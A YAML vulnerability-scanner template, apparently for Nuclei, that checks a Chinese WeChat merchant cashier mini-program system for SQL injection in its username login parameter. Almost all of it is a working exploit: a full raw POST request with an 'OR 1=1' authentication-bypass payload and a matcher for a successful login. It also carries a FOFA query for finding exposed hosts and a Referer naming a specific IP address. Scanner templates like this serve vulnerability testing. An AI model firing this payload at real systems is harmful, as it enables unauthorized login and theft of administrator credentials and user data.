id: check-out-wechat-app-username-sqli

info:
  name: 微信公众号商家收银台小程序系统 username - SQL注入漏洞
  author: qwtd
  severity: high
  description: 微信公众号商家收银台小程序系统 username 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
  metadata:
    fofa: body="/index.php?s=platform/index/captcha"
    max-request: 1
    verified: true
  tags: 微信公众号商家收银台小程序系统

http:
  - raw:
      - |
        POST /index.php?s=platform/index/api_login_check HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Referer: http://119.91.238.71:81/index.php?s=platform/index/index
        Accept-Encoding: gzip, deflate
        Cookie: PHPSESSID=elacuolv9nq9dtbalspgsubr4e
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Accept-Language: zh-CN,zh;q=0.9
        X-Requested-With: XMLHttpRequest
        Content-Length: 53

        username=1'+OR+1%3D1+OR+'1'%3D'1&password=1&code=

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '\u767b\u5f55\u6210\u529f'
      - type: status
        status:
          - 200